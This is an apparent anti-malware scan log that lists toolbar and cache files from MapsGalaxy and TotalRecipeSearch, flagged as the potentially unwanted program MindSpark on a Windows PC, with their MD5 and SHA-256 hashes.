PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lscr.png, No Action By User, 764, 178422, , , , , 809883DE7B5752AF35A6537ED4583E1B, B5E09098C49710F19EF19EACE8167357BEFD2EDDE258C5123886DF7F9C5E2D3D
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lsi.png, No Action By User, 764, 178422, , , , , 9BB7C8151DCA37B1C35B74C759513355, 81DF493A31530CA608AF867F0C0740D3A5A61DF6B96493078463339A20FB43CC
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lssd.png, No Action By User, 764, 178422, , , , , CED5D39CD287940F18A5E2B55282981E, 5CAA9B3A8CB170ED6BF05F0B0B1A0E22DE5BB277F173A48DCE9699D8241F55E0
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\ltrs.png, No Action By User, 764, 178422, , , , , A7B28EBE08CF25BBCBEF7B59E76E0FE1, BDFF259E9A6DA7757458D05F1112533D585C62ED7051CB84E2369AD9ECEDAE3A
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\ltvf.png, No Action By User, 764, 178422, , , , , AF2404CC394EA5FFDFC888EC63B9D0E3, 2B0EDBBDEB14AAC45DDC932FC556048FD7CB81E351770E23F6826DC366C58E0B
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lvs.png, No Action By User, 764, 178422, , , , , 945E3C71247B6B0947BDA4BF3ED682C9, 23688370EA18A5A9039CD9014EBF092C4D6EDD5792B597DE6B4EA372BE9E5A31
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lwb.png, No Action By User, 764, 178422, , , , , C8EE0D1FB9B7B88DFE7799F2E9AF8C9E, 90E4FF80249B6B5A6B4240BD42973C85A6D0200960B471C96CE67606F8FD93D1
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lwf.png, No Action By User, 764, 178422, , , , , D671A529B0D961489E613CDA9B8C2686, F05D1E65E8E59BA8154A75F4BD5E7C1F6116213CFB863134EB98643F4CB2284D
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\lzwinky.png, No Action By User, 764, 178422, , , , , 9808DC1BCEB86739239B82373AFB9E1D, 746D05FB5AAE0EAD6131BE4F0905AF2375450EA4C4BDAF331CE272343BAAF393
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\mgaddons.js, No Action By User, 764, 178422, , , , , 63C078CAE42A5FE80F11EFD2EB3AAACD, 1B9A51F4CF86851AF84530854F1D610AA22CE695EDD44D254EB6346E1731E2DE
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\ok.png, No Action By User, 764, 178422, , , , , 47C6763104F7A02414E649AFF5D65711, 945FE6C4F0EB3EE05FC886ACA5DB71876CCB73D5A6D1FBDF871B8BEDBEB96A03
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\overlay.js, No Action By User, 764, 178422, , , , , 5EBE43E0D867DEDC7552CDE5A54F2C7A, 2E70B6E67A6FC40389AB371F6EE8CFAC1C3D1DCDF8D6307A2E6489AC43B4B30F
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\pid.js, No Action By User, 764, 178422, , , , , E5BA3F582422B2E1A74889AAFA7DF656, C71ABEB66B77C130A87580ED74AF0EF549FFF6F6FD9B738CD16860DA392FF604
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\qstring.js, No Action By User, 764, 178422, , , , , 851AE8A50B1A34CCC2816F3E9DD022B1, 74CD52AC4AC6F444D5AB7E48DC985DE44C869D5E654B976A1546F8D11C7E6E18
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\shield.png, No Action By User, 764, 178422, , , , , D87ECB697395EB9BD3553B74134A6A76, 01A818764FFF994D5C488848A274F175B915EAF44AC1FF3FF4A6FF21360FA5C2
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\spacer.swf, No Action By User, 764, 178422, , , , , 9D45B89D2DA3EFBAD74A27099EA567C3, 1FD2DACB672BE781224018D215DF81B42C1894E8FE7DD853D70CD481E5C38CC2
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\toolbar.js, No Action By User, 764, 178422, , , , , 4301D962618D1B5B0529F44A93E0792C, 1A94F545067E9790BB00A47F1543256824D4DFCDEB39BCAC1C46B788B75760FB
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\yelgrey.png, No Action By User, 764, 178422, , , , , 8851A5BDB4C5CD4A6D1556A4F0A953EE, 9E81BD95DC325CE4D9E1D64DDDCB2E73A2CA38B57555037A285769CBEDCBACA1
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\yellowbg.png, No Action By User, 764, 178422, , , , , 8851A5BDB4C5CD4A6D1556A4F0A953EE, 9E81BD95DC325CE4D9E1D64DDDCB2E73A2CA38B57555037A285769CBEDCBACA1
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\zEnable.css, No Action By User, 764, 178422, , , , , 69632922A89F92764C09221C6F703C8D, 4D54F6C6133CAEC21B3229577C399C3A5C9D31330AC9B77C8DB986D8182C8E61
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\zEnable.htm, No Action By User, 764, 178422, , , , , 6DD15A4EDD98E78E1F2900C45DC7F4B2, 36CA2827FA9464F92EDC170242D6556F606CC5213D97CC9926D2C3634717073A
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON\zEnable.js, No Action By User, 764, 178422, , , , , 20AAD0C5C7925F90EC516D454ED2EAE2, 0FF974899324A632C4C6D7E086B0F713F583C89C844DB531E8E36204F728906D
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\Message\COMMON\8_step1.gif, No Action By User, 764, 178422, , , , , C6FC97F6D0C1C6FA40F561BA944FA31D, 7AED12A501F79F549F9AE20D8E093D8113A4AFF629A3C5F261E12CFAE24833E1
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\Message\COMMON\index.htm, No Action By User, 764, 178422, , , , , E1C629FAB1C2332ECDCBFF6906127C4A, 0C74EC4C5C43BFABBFB3F0C8CB3FF9B52679E8354EA8343B4CE98D9BE97E8803
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\Message\COMMON\rebut4b.htm, No Action By User, 764, 178422, , , , , 20EC93A7A3C42F57A95D64EB415BDACE, F448E30DF0379629EDD10BDA0D127EB6907ED22DE0E504F1637C1A4A61EBD7DF
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\Message\COMMON\shield.png, No Action By User, 764, 178422, , , , , 72CEC4D630FA66E29D0E5083D27003DF, 1B478CA5EDE682259F5A1EEA0A1CC758324ADD9DD815779AA460B30CA276EB19
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39EI\Installr\Cache\files.ini, No Action By User, 764, 178422, , , , , D5586C1EEA50B3D8D102EB4CD8FD8AE6, 3FECD63735BC7AB2D4C6614D0171C389CCF4B0CA8B72A1A1B792B9339F3422DB
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\1011284C, No Action By User, 764, 178464, , , , , 31EFAC2AAD44AC6161148604D9DAF006, A747DE8E326C39182C4C463CF775C9668D1EE1E9EDB63C22F7D2A37323CD7308
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\1011321B, No Action By User, 764, 178464, , , , , 225A026D27D5C747CD6033A62DF25EB5, EC2E6BF1574EA063224A911DF3C2BEC2AABE1C70AC449DB187532BDE712E95B5
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\101134BA.bmp, No Action By User, 764, 178464, , , , , 4594F00647C320F703B88B0C3A53FA64, EA4E20F71F81D20FA0C656A0CCC94794A23FAFF6CA2855F209B4B43EC6B0BA63
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\1011514E.bmp, No Action By User, 764, 178464, , , , , 5E52163916D982FA55E8406F6CE876F2, 1104AE27DEDA59CE5487F26C196B49F710441658A10CD317FE94A25216362F5F
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\1011547A.bmp, No Action By User, 764, 178464, , , , , BFF29672300AEB9C06E453B92FD81133, E1DBA9EE87646C5FD2C532C20DC9660B28415A17A9E43CC13E704F2C5A25AFAD
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\10115766.bmp, No Action By User, 764, 178464, , , , , 3C888681279C28AEFE22E3407751FDDA, 0FCCB55FEDB3C27298890FBE9B901DC6EFFA52CCC4BE213DF81E2231961D7CE1
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\10115860.bmp, No Action By User, 764, 178464, , , , , A861D071853AE86FD5D9EF7BED2891C5, FDFE57E3FFF9BBD45B2D6744A56E49F5A99EA61EC54BC37DB699D8C38B48937C
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\101159E6.bmp, No Action By User, 764, 178464, , , , , 86B2A41C9AB71B544DC636DA4E5C6B04, 4794497B2F67674A17368A71F8F9C7AD6F84AE65DA298D3C3A3C30041ECE05F0
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\10115B6C.bmp, No Action By User, 764, 178464, , , , , 812EF1D4212C253F1A2F09BC9E961811, E0FC5F3E0C3DFC723F43D10AB007766B0F1D32142D29F1C67AF0918E295D1615
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\1011653C.bmp, No Action By User, 764, 178464, , , , , B6BBC59ADBF5E88B133F6838631316D1, 419976EFC0ED538FF3DA32A41BE58AB04C1C9838ACFFC64F773104490A65A70E
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\10116606.bmp, No Action By User, 764, 178464, , , , , 19C0114AB09B9C8F16CF7BEF00B57318, 660408BDFACEA3EF2CA00C4D4AA2D5704919F69187B71314C1CA3836F30C1F4A
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\101166C2.bmp, No Action By User, 764, 178464, , , , , 282A8BADFA69EA2E9B0488C74BF1D5D5, 2D6425E52E9E42FCB96E1BEA4B9165C8F174ECC8922EFF628F892275B9CABBCE
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\1011676D.bmp, No Action By User, 764, 178464, , , , , 81744A73A1A488730DAD5627709C9990, 07B438E28A0CC48BD1AEF91317373F20864E0426A06919DB142EC3C5130C5D99
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\10116819.bmp, No Action By User, 764, 178464, , , , , 4EE3D1FE3AB012849F706F635A86ED21, F7B3C6C4C6CA6FB2190CAE44767EBC918A5F787245B9BC932B75F0D2E896D238
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\101168A5.jhtml, No Action By User, 764, 178464, , , , , A255D29F69C32FB3CD02DB41B63F48AC, 700B18EDC64946A18FFE0E07456CCFC5CB32F9D2A1A5F496898E57E6316347CD
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\1011849E, No Action By User, 764, 178464, , , , , B7C7C045953478B12B6F9713C9723AB5, 83071BABCED233056711334EC566074D4B2EDFE7B6B1D3425B05CF91BC998375
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\1011988B.bmp, No Action By User, 764, 178464, , , , , 0FF6CD83B6D0BAB447941416A6C20FCB, AD39AC6270CEC063B0748103D75383E1C6A41193992CAA21DED2B5CCAAA40D95
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\1030173C.bmp, No Action By User, 764, 178464, , , , , 85D05A1218682566778C6B4B0024588A, A9263A03E9C52736C5E048FA9DA9918AB6CC09725752B928387646DA5F6E2FB7
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache\files.ini, No Action By User, 764, 178464, , , , , D4A151F6039532AB68A4232B2DC38F1D, C45EA16A3D9AAA115EAFA7EC408BA80DD13EE98495CDCD269489B2104F0A071F
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\History\search3, No Action By User, 764, 178464, , , , , 0F343B0931126A20F133D67C2B018A3B, 5F70BF18A086007016E948B04AED3B82103A36BEA41755B6CDDFAF10ACE3C6EF
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Settings\prevcfg2.htm, No Action By User, 764, 178464, , , , , 31EFAC2AAD44AC6161148604D9DAF006, A747DE8E326C39182C4C463CF775C9668D1EE1E9EDB63C22F7D2A37323CD7308
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Settings\setting3.htm, No Action By User, 764, 178464, , , , , C8E25376FD0443689D44808D121F3DCD, 9C4E785F24B9DAB45BAB8D084076930BDF6A7E573BAB972CDEA69E56B5E367A1
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Settings\setting3.htm.bak, No Action By User, 764, 178464, , , , , 5804EB8056C48DBF0E6425D097897C42, 97A8300E659E9F1EE436AE47C2DA3EFED9B908347507830E48755456C6CFCD9D
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Settings\s_w1.dat, No Action By User, 764, 178464, , , , , 8533BDA6AB297E581E5CA90571BE7651, 4FAB5720DE00274D07AFFA63F977FC1765A50423B563E5220E81F431C5F01873
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Settings\s_w1.dat.bak, No Action By User, 764, 178464, , , , , 69D9D891BB7AA83602A2BFD2730F4316, A1E4678AF73FE4B851D98D60D675D6DAE51248B998205290B3BD710C3CEFB528
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Settings\s_w2.dat, No Action By User, 764, 178464, , , , , 1022C24797824E0F987499BBA1C310C3, A2FBB519DE4AFC31862CBB0011351A1EEFD46320BD68F744CDB035FDD31650C6
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Settings\s_w2.dat.bak, No Action By User, 764, 178464, , , , , 9F47FDE5E884B9ABEAC43EA27E62A271, CBF1C54A41090D393A113807E915B136F72772B2B4579C331AA9D0BE3AC72027
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\TotalRecipeSearch_14\Cache\PopupProperties100023739.html, No Action By User, 764, 178464, , , , , 0D30AE0515C11BD1E01BAB9C7F70961E, D648461C763E3F92D1C113CCFFDEF927C680C20582C15CFBE2BE613D46A3560A
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\TotalRecipeSearch_14\Cache\PopupProperties100024344.html, No Action By User, 764, 178464, , , , , DC2CD8F0AA0EF8FD320293E27A32DA90, FE03095F288B6CA48F21A78DDC1926EFE436862E01D1D76DA4DB22625FDF5008
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\TotalRecipeSearch_14\Cache\PopupProperties100025727.html, No Action By User, 764, 178464, , , , , DC2CD8F0AA0EF8FD320293E27A32DA90, FE03095F288B6CA48F21A78DDC1926EFE436862E01D1D76DA4DB22625FDF5008
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\TotalRecipeSearch_14\Cache\PopupProperties100025731.html, No Action By User, 764, 178464, , , , , DC2CD8F0AA0EF8FD320293E27A32DA90, FE03095F288B6CA48F21A78DDC1926EFE436862E01D1D76DA4DB22625FDF5008
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\TotalRecipeSearch_14\Cache\PopupProperties100065004.html, No Action By User, 764, 178464, , , , , 3E7387D8B63F09C84BF3715134AA9FBF, 42D5E2E46AB6EF47CDC0DAD7A7A97009979A1AFD0A853C9750F48FADD05CC5DF
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\TotalRecipeSearch_14\Cache\PopupProperties200821740.html, No Action By User, 764, 178464, , , , , 0D30AE0515C11BD1E01BAB9C7F70961E, D648461C763E3F92D1C113CCFFDEF927C680C20582C15CFBE2BE613D46A3560A
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\TotalRecipeSearch_14\Cache\PopupProperties206980340.html, No Action By User, 764, 178464, , , , , 0D30AE0515C11BD1E01BAB9C7F70961E, D648461C763E3F92D1C113CCFFDEF927C680C20582C15CFBE2BE613D46A3560A
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\TotalRecipeSearch_14\Cache\Radio.html, No Action By User, 764, 178464, , , , , EFE3E57BEC3C386BAC281B53E4C7A101, B0F027CB61638D33A4C05D0BECE3062A85D8B9BBD32C5FEDC02894EE3C561F27
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\btmarrow.png, No Action By User, 764, 178464, , , , , 9552ACDA716E13E800CB66A1C2F6BA15, E116A0B45D656C4FF52F71C61FFE3638C8D807D2119150E0649738D8C166E5ED
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\cancel.png, No Action By User, 764, 178464, , , , , 014BA9CB751089112B72CB14EEE905B4, C02487710C187ABE82B7AC9D894CD9B8C7DB5C173D60BF7981045F7836D57EE5
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\config.js, No Action By User, 764, 178464, , , , , C53FAD04E4AE8110436CF5DD1C97561D, 5A294D49F939C6087BC447BEE28A1DB86889F88A75EEBBDE9E4B1DFE748367E8
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\continue.png, No Action By User, 764, 178464, , , , , D0DA2F828903118AA4973C576708516B, 9607F08803D67AA2539474A50EC0CB3B751B1256DC38B7FD97F18CC94B425B34
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\dispatch.js, No Action By User, 764, 178464, , , , , 690A15DE7A3AF0362E7EE6B41EB314E7, 8E8324007CF991B11147CBC7FA4F4EB867222616F627080A47C33F40C99EBDC7
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\divider.png, No Action By User, 764, 178464, , , , , 93E6B5D0DD9EB1E93C3B07F7F2D5FC8E, FF542FA743AA4DA5D37F9C32A5B4B849AB4DEF1ECFD4E333626A8B0C07F960CD
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\gcancel.png, No Action By User, 764, 178464, , , , , 54E763E8130985D7CF66A93E6017EDEB, 8CAD808847E45F9854AACB6394E2C0018BA845A852F211BB7C01206E975DA69E
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\index.htm, No Action By User, 764, 178464, , , , , 15DC443A542912CA2C24A0608AFC29C2, E89D798C633C8D68AFC40CCF4117CB1FDA281BD1C07346289BF7689C72916DB2
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\infobar.js, No Action By User, 764, 178464, , , , , 9E1484BDC3B79FB11373EFE19D08B07E, 58F41868009D3DCF34DCCBBD045238CE6A2056B361D39B746C073E36C267B895
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\jquery.js, No Action By User, 764, 178464, , , , , B04A3BCCD23DDEB7982143707A63CCF9, 764B9E9F3AD386AAA5CDEAE9368353994DE61C0BEDE087C8F7E3579CB443DE3B
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\la.png, No Action By User, 764, 178464, , , , , 8D3C2E4BBA0F0A7A199261F547EDA801, FC1D485081497AC045E0C989B2D357B9556D1D476E52997D58F8FD372648A6D7
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lbcs.png, No Action By User, 764, 178464, , , , , F4FDAD34608EE0B8DDE98F85E635BBAD, E2E5FB7C2C5CC04B4B64AF03F8B326015D6FB93508BDB45E8C3FAD1063A72BD4
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lbms.png, No Action By User, 764, 178464, , , , , 2F2FC09A6BC2DA05A2B4802889BCF769, 57A0C066541733BD3DB48AB5A535DDEC6CC0136A894E81D89C70D8FA59B8E9F1
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lca.png, No Action By User, 764, 178464, , , , , 602E9218366A3AF3129040A1D2455207, ECE4EC15CB16EFD1401123BFC2D22215BCAD667750C9F5E4B44C4467CE4200C1
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lcfc.png, No Action By User, 764, 178464, , , , , 6810A20D9DE8982B07F68B8B42FFE056, 8E4D1296933910108C775C312A6709652530D7969133077D57767BD0E15B3E94
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lcm.png, No Action By User, 764, 178464, , , , , F5CFC35ACBBB13168D7719F65F594699, 300022F70E9E1A7E3DA874B3302FAE15A440AE9448BECBF76760F9E0BE9A5ED8
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lcs.png, No Action By User, 764, 178464, , , , , 6D687A359BECD46722EB9EBEB4ABE895, 9F32EE81E0336DB1A0E4B480299368857D46DD71E1286CA4489CF8F3A6D4480A
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lcso.png, No Action By User, 764, 178464, , , , , F5E3AB4D2E9F327214669170A0ED5F10, C54250DAE2B0A2605385286A045BD0D6B92894DED6B1019154F42759E9217E53
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lctn.png, No Action By User, 764, 178464, , , , , FC9864056DC600E0CB8D649AFEBF12A8, 6C153D8E5A4FEC8288B885D8D86599E17C1A2AADDC0E5A6BC6023AE3DA52A700
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\ldb.png, No Action By User, 764, 178464, , , , , 1DCD63127EA307D093BD20123B8CCDA7, EED248F66B7DEDA6B7E806A000607CF8C4C447DBFC47A7F8243FA6CB0E4D03D1
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\ldbg.png, No Action By User, 764, 178464, , , , , 10199BEC1960A9F8AC6E812D94BCF2C4, FCE46AEC740F299430B9D682EB2036490571B725CC061FD7B220CF04C0BBCC3D
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lddg.png, No Action By User, 764, 178464, , , , , E5FD2FB892E79349A23A1AC7CBF9D86C, 022E6B949FA6C552504A01B1BD262F46C401EA2D8E7A88102FC9400D34385139
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lff.png, No Action By User, 764, 178464, , , , , 0135659EA712BF025E93F0E37E0F1E6C, 67B19DDC3DD17E5ACF3FB9D7F7ABF64E6938A5165CA331261C39402853CDE4C3
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lffb.png, No Action By User, 764, 178464, , , , , 279E1FB668C1DAF2A8DEBBA9CD9EBE01, 88F08DAB35571E253129793DBBFD90600CBBF0D375E117FA54959796F12D5248
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lg.png, No Action By User, 764, 178464, , , , , C5148C3B371D3ED362B70DF9D522981B, F816DD1D0B371F564B37A7232097BB2E0314A99C98FC9966AB7AC1DA4EEBA437
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lgs.png, No Action By User, 764, 178464, , , , , 9BDF7090AB1C2A70C131543A45D7F887, 01B7FB137C30936F907EB8899BE3BF086A1BBF989A5BDFE81921FD8F621627FA
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lgw.png, No Action By User, 764, 178464, , , , , 728C8911A616C1FC43CB270EFB04CECD, E55525AB0FC643673EF903E805B5721447598FDA4E4EA3ACBECE0AB02C43D927
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lha.png, No Action By User, 764, 178464, , , , , E49B90C17E66A7ACE96119F03EA86C7D, B251ADB5588A04B8CAFB1ACCD5FE9976A64F83033AA4ECCC10230DE10D0B852A
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lhp.png, No Action By User, 764, 178464, , , , , 342D1F539678454F021E918E171654B9, 47249B88CF4903AAEC1DAA87432DD2F47A65EF372EB05319526E6DF6C567B14B
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lia.png, No Action By User, 764, 178464, , , , , 8B3A56FCC9681AC1CF103A98E0ADD9C5, 90FD97BC8EBBE4B7D8BA658E0AD5B58C1BB3B9FACDC80B184973E6F987621FCE
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\liwon.png, No Action By User, 764, 178464, , , , , 04F21C743EABC6D00DB463F0C5A71F93, 3EB0C337A5286BBE443D5D37E3173B525FFB49F4177E24E68F504B6CB5D56DDA
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lkazulah.png, No Action By User, 764, 178464, , , , , 7CBAE7AA0A05F6E0870E53FED56FC17A, 8E474635BA11AC888E3B59501EB5FCA0ABA52FF7373130BFA263795DEEC15FA7
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lmd.png, No Action By User, 764, 178464, , , , , 3005912C361D561B8658881FD939A9FB, 28741359FC397103CA0D8FD3B8FA3DF681C29EDD2E7231428E6577C895A14433
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lmfc.png, No Action By User, 764, 178464, , , , , A695C8CC48CC35E1C5517DFDAB724751, 581C93C56D34032B7EA91CD98BF3FEA2415097CDDB1FC4BD19CFB5B7756FD53A
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lmh.png, No Action By User, 764, 178464, , , , , E2124BFAFC55EC692115033CFAE4E198, 213662C5FED552ECF7EDEE899FFE683A7F8CBD3B9EBAFB934010E888839F2666
